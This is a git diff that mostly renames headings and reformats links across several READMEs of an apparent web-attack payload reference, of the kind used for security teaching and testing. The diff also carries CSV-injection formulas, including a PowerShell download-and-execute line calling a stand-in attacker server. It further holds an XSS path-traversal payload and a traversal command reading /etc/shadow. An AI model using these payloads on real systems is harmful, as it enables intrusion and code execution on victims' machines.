diff --git a/Business Logic Errors/README.md b/Business Logic Errors/README.md index f3f46b2..6cc56fd 100644 --- a/Business Logic Errors/README.md +++ b/Business Logic Errors/README.md @@ -5,7 +5,7 @@ ## Summary -* [Examples](#examples) +* [Methodology](#methodology) * [Review Feature Testing](#review-feature-testing) * [Discount Code Feature Testing](#discount-code-feature-testing) * [Delivery Fee Manipulation](#delivery-fee-manipulation) @@ -17,7 +17,7 @@ * [References](#references) -## Examples +## Methodology Unlike other types of security vulnerabilities like SQL injection or cross-site scripting (XSS), business logic errors do not rely on problems in the code itself (like unfiltered user input). Instead, they take advantage of the normal, intended functionality of the application, but use it in ways that the developer did not anticipate and that have undesired consequences. diff --git a/CORS Misconfiguration/README.md b/CORS Misconfiguration/README.md index f805bc6..8d599db 100644 --- a/CORS Misconfiguration/README.md +++ b/CORS Misconfiguration/README.md @@ -7,7 +7,7 @@ * [Tools](#tools) * [Requirements](#requirements) -* [Exploitation](#exploitation) +* [Methodology](#methodology) * [Origin Reflection](#origin-reflection) * [Null Origin](#null-origin) * [XSS on Trusted Origin](#xss-on-trusted-origin) @@ -33,7 +33,7 @@ * VICTIM HEADER> `Access-Control-Allow-Origin: https://evil.com` OR `Access-Control-Allow-Origin: null` -## Exploitation +## Methodology Usually you want to target an API endpoint. Use the following payload to exploit a CORS misconfiguration on target `https://victim.example.com/endpoint`. diff --git a/CRLF Injection/README.md b/CRLF Injection/README.md index 84b028e..bf75112 100644 --- a/CRLF Injection/README.md +++ b/CRLF Injection/README.md @@ -7,15 +7,18 @@ ## Summary -- [Add a cookie](#add-a-cookie) -- [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass) -- [Write HTML](#write-html) -- [Filter Bypass](#filter-bypass) -- [Labs](#labs) -- [References](#references) +* [Methodology](#methodology) + * [Add a cookie](#add-a-cookie) + * [Add a cookie - XSS Bypass](#add-a-cookie---xss-bypass) + * [Write HTML](#write-html) +* [Filter Bypass](#filter-bypass) +* [Labs](#labs) +* [References](#references) -## Add a cookie +## Methodology + +### Add a cookie Requested page @@ -39,7 +42,7 @@ x-xss-protection: 1; mode=block ``` -## Add a cookie - XSS Bypass +### Add a cookie - XSS Bypass Requested page @@ -71,7 +74,7 @@ X-XSS-Protection:0 ``` -## Write HTML +### Write HTML Requested page diff --git a/CSV Injection/README.md b/CSV Injection/README.md index 91dc494..eb856d9 100644 --- a/CSV Injection/README.md +++ b/CSV Injection/README.md @@ -1,53 +1,49 @@ # CSV Injection -Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. +> Many web applications allow the user to download content such as templates for invoices or user settings to a CSV file. Many users choose to open the CSV file in either Excel, Libre Office or Open Office. When a web application does not properly validate the contents of the CSV file, it could lead to contents of a cell or many cells being executed. -## Exploit + +## Summary + +* [Methodology](#methodology) +* [References](#references) + + +## Methodology Basic exploits with **Dynamic Data Exchange**. +* Spawn a calc + ```powershell + DDE ("cmd";"/C calc";"!A0")A0 + @SUM(1+1)*cmd|' /C calc'!A0 + =2+5+cmd|' /C calc'!A0 + =cmd|' /C calc'!'A1' + ``` -Payload: pop a calc +* PowerShell download and execute + ```powershell + =cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 + ``` -```powershell -DDE ("cmd";"/C calc";"!A0")A0 -@SUM(1+1)*cmd|' /C calc'!A0 -=2+5+cmd|' /C calc'!A0 -``` +* Prefix obfuscation and command chaining + ```powershell + =AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A + =cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A + +thespanishinquisition(cmd|'/c calc.exe'!A + = cmd|'/c calc.exe'!A + ``` -Payload: pop a notepad +* Using rundll32 instead of cmd + ```powershell + =rundll32|'URL.dll,OpenURL calc.exe'!A + =rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A + ``` -```powershell -=cmd|' /C notepad'!'A1' -``` - -Payload: powershell download and execute - -```powershell -=cmd|'/C powershell IEX(wget attacker_server/shell.exe)'!A0 -``` - -Payload: Prefix obfuscation and command chaining - -```powershell -=AAAA+BBBB-CCCC&"Hello"/12345&cmd|'/c calc.exe'!A -=cmd|'/c calc.exe'!A*cmd|'/c calc.exe'!A -+thespanishinquisition(cmd|'/c calc.exe'!A -= cmd|'/c calc.exe'!A -``` - -Payload: Using rundll32 instead of cmd - -```powershell -=rundll32|'URL.dll,OpenURL calc.exe'!A -=rundll321234567890abcdefghijklmnopqrstuvwxyz|'URL.dll,OpenURL calc.exe'!A -``` - -Payload: Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. - -```powershell -= C m D | '/ c c al c . e x e ' ! A -``` +* Using null characters to bypass dictionary filters. Since they are not spaces, they are ignored when executed. + ```powershell + = C m D | '/ c c al c . e x e ' ! A + ``` Technical details of the above payloads: diff --git a/CVE Exploits/README.md b/CVE Exploits/README.md index 34aef72..fd98e77 100644 --- a/CVE Exploits/README.md +++ b/CVE Exploits/README.md @@ -1,6 +1,6 @@ # Common Vulnerabilities and Exposures -A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems. +> A CVE (Common Vulnerabilities and Exposures) is a unique identifier assigned to a publicly known cybersecurity vulnerability. CVEs help standardize the naming and tracking of vulnerabilities, making it easier for organizations, security professionals, and software vendors to share information and manage risks associated with these vulnerabilities. Each CVE entry includes a brief description of the vulnerability, its potential impact, and details about affected software or systems. ## Summary diff --git a/Clickjacking/README.md b/Clickjacking/README.md index 23a23e8..9c0f310 100644 --- a/Clickjacking/README.md +++ b/Clickjacking/README.md @@ -24,9 +24,10 @@ ## Tools -* [Burp Suite](https://portswigger.net/burp) -* [OWASP ZAP](https://github.com/zaproxy/zaproxy) -* [Clickjack](https://github.com/machine1337/clickjack) +* [portswigger/burp](https://portswigger.net/burp) +* [zaproxy/zaproxy](https://github.com/zaproxy/zaproxy) +* [machine1337/clickjack](https://github.com/machine1337/clickjack) + ## Methodology diff --git a/Client Side Path Traversal/README.md b/Client Side Path Traversal/README.md index 9580429..d8bacf7 100644 --- a/Client Side Path Traversal/README.md +++ b/Client Side Path Traversal/README.md @@ -10,8 +10,9 @@ ## Summary * [Tools](#tools) -* [CSPT to XSS](#cspt-to-xss) -* [CSPT to CSRF](#cspt-to-xss) +* [Methodology](#methodology) + * [CSPT to XSS](#cspt-to-xss) + * [CSPT to CSRF](#cspt-to-xss) * [Labs](#labs) * [References](#references) @@ -21,7 +22,9 @@ * [doyensec/CSPTBurpExtension](https://github.com/doyensec/CSPTBurpExtension) - CSPT is an open-source Burp Suite extension to find and exploit Client-Side Path Traversal. -## CSPT to XSS +## Methodology + +### CSPT to XSS ![](https://matanber.com/images/blog/cspt-query-param.png) @@ -35,7 +38,7 @@ A post-serving page calls the fetch function, sending a request to a URL with at * Final payload is `https://example.com/static/cms/news.html?newsitemid=../pricing/default.js?cb=alert(document.domain)//` -## CSPT to CSRF +### CSPT to CSRF A CSPT is redirecting legitimate HTTP requests, allowing the front end to add necessary tokens for API calls, such as authentication or CSRF tokens. This capability can potentially be exploited to circumvent existing CSRF protection measures. diff --git a/Command Injection/README.md b/Command Injection/README.md index 1d965d6..c0bd640 100644 --- a/Command Injection/README.md +++ b/Command Injection/README.md @@ -6,7 +6,7 @@ ## Summary * [Tools](#tools) -* [Exploits](#exploits) +* [Methodology](#methodology) * [Basic commands](#basic-commands) * [Chaining commands](#chaining-commands) * [Argument injection](#argument-injection) @@ -46,7 +46,7 @@ * [projectdiscovery/interactsh](https://github.com/projectdiscovery/interactsh) - An OOB interaction gathering server and client library -## Exploits +## Methodology Command injection, also known as shell injection, is a type of attack in which the attacker can execute arbitrary commands on the host operating system via a vulnerable application. This vulnerability can exist when an application passes unsafe user-supplied data (forms, cookies, HTTP headers, etc.) to a system shell. In this context, the system shell is a command-line interface that processes commands to be executed, typically on a Unix or Linux system. diff --git a/Cross-Site Request Forgery/README.md b/Cross-Site Request Forgery/README.md index d800636..e4ed72f 100644 --- a/Cross-Site Request Forgery/README.md +++ b/Cross-Site Request Forgery/README.md @@ -9,7 +9,7 @@ * [Methodology](#methodology) * [Payloads](#payloads) * [HTML GET - Requiring User Interaction](#html-get---requiring-user-interaction) - * [HTML GET - No User Interaction)](#html-get---no-user-interaction) + * [HTML GET - No User Interaction](#html-get---no-user-interaction) * [HTML POST - Requiring User Interaction](#html-post---requiring-user-interaction) * [HTML POST - AutoSubmit - No User Interaction](#html-post---autosubmit---no-user-interaction) * [HTML POST - multipart/form-data with file upload - Requiring User Interaction](#html-post---multipartform-data-with-file-upload---requiring-user-interaction) @@ -22,7 +22,7 @@ ## Tools -* [XSRFProbe - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit.](https://github.com/0xInfection/XSRFProbe) +* [0xInfection/XSRFProbe](https://github.com/0xInfection/XSRFProbe) - The Prime Cross Site Request Forgery Audit and Exploitation Toolkit. ## Methodology diff --git a/DNS Rebinding/README.md b/DNS Rebinding/README.md index e449ee2..fb3d6d7 100644 --- a/DNS Rebinding/README.md +++ b/DNS Rebinding/README.md @@ -5,7 +5,7 @@ ## Summary * [Tools](#tools) -* [Exploitation](#exploitation) +* [Methodology](#methodology) * [Protection Bypasses](#protection-bypasses) * [0.0.0.0](#0000) * [CNAME](#CNAME) @@ -15,11 +15,11 @@ ## Tools -- [Singularity of Origin](https://github.com/nccgroup/singularity) - is a tool to perform DNS rebinding attacks. -- [Singularity of Origin Web Client](http://rebind.it/) (manager interface, port scanner and autoattack) +- [nccgroup/singularity](https://github.com/nccgroup/singularity) - A DNS rebinding attack framework. +- [rebind.it](http://rebind.it/) - Singularity of Origin Web Client. -## Exploitation +## Methodology First, we need to make sure that the targeted service is vulnerable to DNS rebinding. It can be done with a simple curl request: @@ -75,6 +75,7 @@ $ dig www.example.com +noall +answer localhost.example.com. 381 IN CNAME localhost. ``` + ## References - [How Do DNS Rebinding Attacks Work? - nccgroup - Apr 9, 2019](https://github.com/nccgroup/singularity/wiki/How-Do-DNS-Rebinding-Attacks-Work%3F) diff --git a/Dom Clobbering/README.md b/DOM Clobbering/README.md similarity index 86% rename from Dom Clobbering/README.md rename to DOM Clobbering/README.md index 8f8cd94..ffe815c 100644 --- a/Dom Clobbering/README.md +++ b/DOM Clobbering/README.md @@ -1,22 +1,15 @@ -# Dom Clobbering +# DOM Clobbering > DOM Clobbering is a technique where global variables can be overwritten or "clobbered" by naming HTML elements with certain IDs or names. This can cause unexpected behavior in scripts and potentially lead to security vulnerabilities. ## Summary +* [Methodology](#methodology) * [Lab](#lab) -* [Exploit](#exploit) * [References](#references) -## Lab - -* [Lab: Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering) -* [Lab: Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters) -* [Lab: DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/) - - -## Exploit +## Methodology Exploitation requires any kind of `HTML injection` in the page. @@ -124,6 +117,13 @@ Exploitation requires any kind of `HTML injection` in the page. * DomPurify allows the protocol `cid:`, which doesn't encode double quote (`"`): `` +## Lab + +* [PortSwigger - Exploiting DOM clobbering to enable XSS](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-xss-exploiting-dom-clobbering) +* [PortSwigger - Clobbering DOM attributes to bypass HTML filters](https://portswigger.net/web-security/dom-based/dom-clobbering/lab-dom-clobbering-attributes-to-bypass-html-filters) +* [PortSwigger - DOM clobbering test case protected by CSP](https://portswigger-labs.net/dom-invader/testcases/augmented-dom-script-dom-clobbering-csp/) + + ## References - [Bypassing CSP via DOM clobbering - Gareth Heyes - 05 June 2023](https://portswigger.net/research/bypassing-csp-via-dom-clobbering) diff --git a/Denial of Service/README.md b/Denial of Service/README.md index f063c30..2656e7d 100644 --- a/Denial of Service/README.md +++ b/Denial of Service/README.md @@ -5,14 +5,17 @@ ## Summary -* [Examples](#examples) +* [Methodology](#methodology) * [Locking Customer Accounts](#locking-customer-accounts) * [File Limits on FileSystem](#file-limits-on-filesystem) * [Memory Exhaustion - Technology Related](#memory-exhaustion---technology-related) * [References](#references) -## Examples +## Methodology + +Here are some examples of Denial of Service (DoS) attacks. These examples should serve as a reference for understanding the concept, but any DoS testing should be conducted cautiously, as it can disrupt the target environment and potentially result in loss of access or exposure of sensitive data. + ### Locking Customer Accounts diff --git a/Dependency Confusion/README.md b/Dependency Confusion/README.md index 7795912..94f5520 100644 --- a/Dependency Confusion/README.md +++ b/Dependency Confusion/README.md @@ -5,21 +5,22 @@ ## Summary * [Tools](#tools) -* [Exploit](#exploitation) +* [Methodology](#methodology) + * [NPM Example](#npm-example) * [References](#references) ## Tools -* [Confused](https://github.com/visma-prodsec/confused) +* [visma-prodsec/confused](https://github.com/visma-prodsec/confused) - Tool to check for dependency confusion vulnerabilities in multiple package management systems -## Exploit +## Methodology Look for `npm`, `pip`, `gem` packages, the methodology is the same : you register a public package with the same name of private one used by the company and then you wait for it to be used. -### NPM example +### NPM Example * List all the packages (ie: package.json, composer.json, ...) * Find the package missing from https://www.npmjs.com/ diff --git a/Directory Traversal/README.md b/Directory Traversal/README.md index 2d5cb6d..e6ce9b2 100644 --- a/Directory Traversal/README.md +++ b/Directory Traversal/README.md @@ -5,7 +5,7 @@ ## Summary * [Tools](#tools) -* [Basic exploitation](#basic-exploitation) +* [Methodology](#methodology) * [16 bits Unicode encoding](#16-bits-unicode-encoding) * [UTF-8 Unicode encoding](#utf-8-unicode-encoding) * [Bypass "../" replaced by ""](#bypass--replaced-by-) @@ -21,15 +21,16 @@ * [Labs](#labs) * [References](#references) + ## Tools -- [dotdotpwn - https://github.com/wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) +- [wireghoul/dotdotpwn](https://github.com/wireghoul/dotdotpwn) - The Directory Traversal Fuzzer ```powershell - git clone https://github.com/wireghoul/dotdotpwn perl dotdotpwn.pl -h 10.10.10.10 -m ftp -t 300 -f /etc/shadow -s -q -b ``` -## Basic exploitation + +## Methodology We can use the `..` characters to access the parent directory, the following strings are several encoding that can help you bypass a poorly implemented filter. @@ -258,12 +259,12 @@ The following log files are controllable and can be included with an evil payloa ## Labs -* [File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple) -* [File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass) -* [File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively) -* [File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode) -* [File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path) -* [File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass) +* [PortSwigger - File path traversal, simple case](https://portswigger.net/web-security/file-path-traversal/lab-simple) +* [PortSwigger - File path traversal, traversal sequences blocked with absolute path bypass](https://portswigger.net/web-security/file-path-traversal/lab-absolute-path-bypass) +* [PortSwigger - File path traversal, traversal sequences stripped non-recursively](https://portswigger.net/web-security/file-path-traversal/lab-sequences-stripped-non-recursively) +* [PortSwigger - File path traversal, traversal sequences stripped with superfluous URL-decode](https://portswigger.net/web-security/file-path-traversal/lab-superfluous-url-decode) +* [PortSwigger - File path traversal, validation of start of path](https://portswigger.net/web-security/file-path-traversal/lab-validate-start-of-path) +* [PortSwigger - File path traversal, validation of file extension with null byte bypass](https://portswigger.net/web-security/file-path-traversal/lab-validate-file-extension-null-byte-bypass) ## References